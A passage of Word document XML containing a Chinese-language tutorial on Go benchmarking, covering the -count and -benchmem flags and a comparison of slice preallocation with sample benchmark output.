          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3787E2" w14:textId="4C64D692" w:rsidR="00EA69BE" w:rsidRDefault="00EA69BE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5388876A" w14:textId="3B7E0879" w:rsidR="00EA69BE" w:rsidRDefault="00EA69BE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA69BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-count </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA69BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数可以用来设置</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA69BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> benchmark </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA69BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的轮数。例如，进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA69BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA69BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>轮</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA69BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> benchmark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D17F088" w14:textId="45E1C15A" w:rsidR="00EA69BE" w:rsidRDefault="00EA69BE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A84582">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">go test -bench='Fib$' -benchtime=5s </w:t>
      </w:r>
      <w:r w:rsidRPr="00A84582">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-count=3</w:t>
      </w:r>
      <w:r w:rsidRPr="00A84582">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4241A6BB" w14:textId="30F936FD" w:rsidR="00C77AE2" w:rsidRDefault="00C77AE2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63BF52B0" w14:textId="07AE05B4" w:rsidR="00331F09" w:rsidRDefault="00961825" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测量内存分配次数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B39E89B" w14:textId="77777777" w:rsidR="00331F09" w:rsidRDefault="00331F09" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46B1DE79" w14:textId="77777777" w:rsidR="002E5630" w:rsidRDefault="002E5630" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-benchmem </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数可以度量内存分配的次数。内存分配次数也性能也是息息相关的，例如不合理的切片容量，将导致内存重新分配，带来不必要的开销。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B0B295" w14:textId="77777777" w:rsidR="002E5630" w:rsidRDefault="002E5630" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68E7EE52" w14:textId="28C7D98E" w:rsidR="00615590" w:rsidRDefault="002E5630" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在下面的例子中，</w:t>
      </w:r>
      <w:r w:rsidRPr="00834C46">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>generateWithCap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00834C46">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>generate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的作用是一致的，生成一组长度为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> n </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的随机序列。</w:t>
      </w:r>
      <w:r w:rsidRPr="00834C46">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>唯一的不同在于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">generateWithCap </w:t>
      </w:r>
      <w:r w:rsidRPr="00387E29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>创建切片时，将切片的容量</w:t>
      </w:r>
      <w:r w:rsidRPr="00387E29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>(capacity)</w:t>
      </w:r>
      <w:r w:rsidRPr="00387E29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>设置为</w:t>
      </w:r>
      <w:r w:rsidRPr="00387E29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> n</w:t>
      </w:r>
      <w:r w:rsidRPr="00387E29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，这样切片就会一次性申请</w:t>
      </w:r>
      <w:r w:rsidRPr="00387E29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> n </w:t>
      </w:r>
      <w:r w:rsidRPr="00387E29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>个整数所需的内存。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F1F202" w14:textId="7DDDECE5" w:rsidR="002E5630" w:rsidRDefault="002E5630" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A39EEB3" w14:textId="77777777" w:rsidR="00834C46" w:rsidRDefault="00834C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>// generate_test.go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B873527" w14:textId="77777777" w:rsidR="00834C46" w:rsidRDefault="00834C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0ED0C3" w14:textId="77777777" w:rsidR="00834C46" w:rsidRDefault="00834C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C6BC080" w14:textId="77777777" w:rsidR="00834C46" w:rsidRDefault="00834C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC4CB7D" w14:textId="77777777" w:rsidR="00834C46" w:rsidRDefault="00834C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>"math/rand"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BF3DD8" w14:textId="77777777" w:rsidR="00834C46" w:rsidRDefault="00834C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>"testing"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B47397" w14:textId="77777777" w:rsidR="00834C46" w:rsidRDefault="00834C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>"time"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C345E5" w14:textId="77777777" w:rsidR="00834C46" w:rsidRDefault="00834C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5D1418" w14:textId="77777777" w:rsidR="00834C46" w:rsidRDefault="00834C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43D8B582" w14:textId="77777777" w:rsidR="00834C46" w:rsidRDefault="00834C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00834C46">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>func generateWithCap(n int) []int {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB81F6E" w14:textId="77777777" w:rsidR="00834C46" w:rsidRDefault="00834C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>rand.Seed(time.Now().UnixNano())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119AABAF" w14:textId="77777777" w:rsidR="00834C46" w:rsidRDefault="00834C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>nums := make([]int, 0, n)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B921A0" w14:textId="77777777" w:rsidR="00834C46" w:rsidRDefault="00834C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>for i := 0; i &lt; n; i++ {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4BFB26" w14:textId="77777777" w:rsidR="00834C46" w:rsidRDefault="00834C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>nums = append(nums, rand.Int())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEEBCBE" w14:textId="77777777" w:rsidR="00834C46" w:rsidRDefault="00834C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CB99FD" w14:textId="77777777" w:rsidR="00834C46" w:rsidRDefault="00834C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>return nums</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DF7E5D" w14:textId="77777777" w:rsidR="00834C46" w:rsidRDefault="00834C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FF8E93" w14:textId="77777777" w:rsidR="00834C46" w:rsidRDefault="00834C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="280D809C" w14:textId="77777777" w:rsidR="00834C46" w:rsidRDefault="00834C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00834C46">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>func generate(n int) []int {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290BA708" w14:textId="77777777" w:rsidR="00834C46" w:rsidRDefault="00834C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>rand.Seed(time.Now().UnixNano())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F13A6E3" w14:textId="77777777" w:rsidR="00834C46" w:rsidRDefault="00834C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>nums := make([]int, 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF62927" w14:textId="77777777" w:rsidR="00834C46" w:rsidRDefault="00834C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>for i := 0; i &lt; n; i++ {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5195C370" w14:textId="77777777" w:rsidR="00834C46" w:rsidRDefault="00834C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>nums = append(nums, rand.Int())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79778CB4" w14:textId="77777777" w:rsidR="00834C46" w:rsidRDefault="00834C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5DE09B" w14:textId="77777777" w:rsidR="00834C46" w:rsidRDefault="00834C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>return nums</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7E8707" w14:textId="77777777" w:rsidR="00834C46" w:rsidRDefault="00834C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570F06F6" w14:textId="77777777" w:rsidR="00834C46" w:rsidRDefault="00834C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="768AE919" w14:textId="77777777" w:rsidR="00834C46" w:rsidRDefault="00834C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00834C46">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>func BenchmarkGenerateWithCap(b *testing.B) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1D6D33" w14:textId="77777777" w:rsidR="00834C46" w:rsidRPr="00834C46" w:rsidRDefault="00834C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00834C46">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>for n := 0; n &lt; b.N; n++ {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F326F3" w14:textId="77777777" w:rsidR="00834C46" w:rsidRPr="00834C46" w:rsidRDefault="00834C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00834C46">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00834C46">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>generateWithCap(1000000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2A27EC" w14:textId="77777777" w:rsidR="00834C46" w:rsidRDefault="00834C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00834C46">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384A54F0" w14:textId="77777777" w:rsidR="00834C46" w:rsidRDefault="00834C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A94A9D" w14:textId="77777777" w:rsidR="00834C46" w:rsidRDefault="00834C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77A03130" w14:textId="77777777" w:rsidR="00834C46" w:rsidRDefault="00834C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00834C46">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>func BenchmarkGenerate(b *testing.B) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578BFB91" w14:textId="77777777" w:rsidR="00834C46" w:rsidRPr="00834C46" w:rsidRDefault="00834C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00834C46">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>for n := 0; n &lt; b.N; n++ {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303ED0B4" w14:textId="77777777" w:rsidR="00834C46" w:rsidRPr="00834C46" w:rsidRDefault="00834C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00834C46">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00834C46">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>generate(1000000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D959DC" w14:textId="77777777" w:rsidR="00834C46" w:rsidRDefault="00834C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00834C46">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D619E8" w14:textId="51595045" w:rsidR="002E5630" w:rsidRDefault="00834C46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1875A9" w14:textId="37668C38" w:rsidR="002E5630" w:rsidRDefault="002E5630" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="741E002E" w14:textId="31BFB46D" w:rsidR="002E5630" w:rsidRDefault="00387E29" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结果如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78993686" w14:textId="77777777" w:rsidR="00387E29" w:rsidRPr="00387E29" w:rsidRDefault="00387E29" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00387E29">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>go test -bench='Generate' .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CDA41F" w14:textId="77777777" w:rsidR="00387E29" w:rsidRPr="00387E29" w:rsidRDefault="00387E29" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00387E29">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>goos: darwin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741E1366" w14:textId="77777777" w:rsidR="00387E29" w:rsidRPr="00387E29" w:rsidRDefault="00387E29" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00387E29">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>goarch: amd64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DB1D9A" w14:textId="77777777" w:rsidR="00387E29" w:rsidRPr="00387E29" w:rsidRDefault="00387E29" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00387E29">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>pkg: example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310B6600" w14:textId="77777777" w:rsidR="00387E29" w:rsidRPr="00387E29" w:rsidRDefault="00387E29" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00387E29">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>BenchmarkGenerateWithCap-8            44          24294582 ns/op</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D54EBAA" w14:textId="77777777" w:rsidR="00387E29" w:rsidRPr="00387E29" w:rsidRDefault="00387E29" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00387E29">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>BenchmarkGenerate-8                   34          30342763 ns/op</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE18E2E" w14:textId="77777777" w:rsidR="00387E29" w:rsidRPr="00387E29" w:rsidRDefault="00387E29" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00387E29">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>PASS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22797804" w14:textId="3118681C" w:rsidR="00387E29" w:rsidRDefault="00387E29" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00387E29">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ok      example 2.171s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356B46CB" w14:textId="77777777" w:rsidR="002E5630" w:rsidRDefault="002E5630" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D843667" w14:textId="5A0F5AA6" w:rsidR="00615590" w:rsidRDefault="00387E29" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00387E29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00387E29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00387E29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-benchmem</w:t>
      </w:r>
      <w:r w:rsidRPr="00387E29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00387E29">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数看到内存分配的情况：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A158459" w14:textId="46830F57" w:rsidR="00387E29" w:rsidRDefault="00387E29" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="404300BD" w14:textId="77777777" w:rsidR="00387E29" w:rsidRDefault="00387E29" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>goos: darwin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658023BB" w14:textId="77777777" w:rsidR="00387E29" w:rsidRDefault="00387E29" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>goarch: amd64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE7AB4D" w14:textId="77777777" w:rsidR="00387E29" w:rsidRDefault="00387E29" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>pkg: example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A3982A" w14:textId="77777777" w:rsidR="00387E29" w:rsidRDefault="00387E29" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">BenchmarkGenerateWithCap-8  43  24335658 ns/op  </w:t>
      </w:r>
      <w:r w:rsidRPr="00387E29">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>8003641 B/op    1 allocs/op</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20117261" w14:textId="77777777" w:rsidR="00387E29" w:rsidRDefault="00387E29" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">BenchmarkGenerate-8         33  30403687 ns/op  </w:t>
      </w:r>
      <w:r w:rsidRPr="00387E29">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>45188395 B/op  40 allocs/op</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585DB519" w14:textId="77777777" w:rsidR="00387E29" w:rsidRDefault="00387E29" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>PASS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF0619C" w14:textId="1DF97353" w:rsidR="00387E29" w:rsidRDefault="00387E29" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ok      example 2.121s</w:t>
      </w:r>
    </w:p>
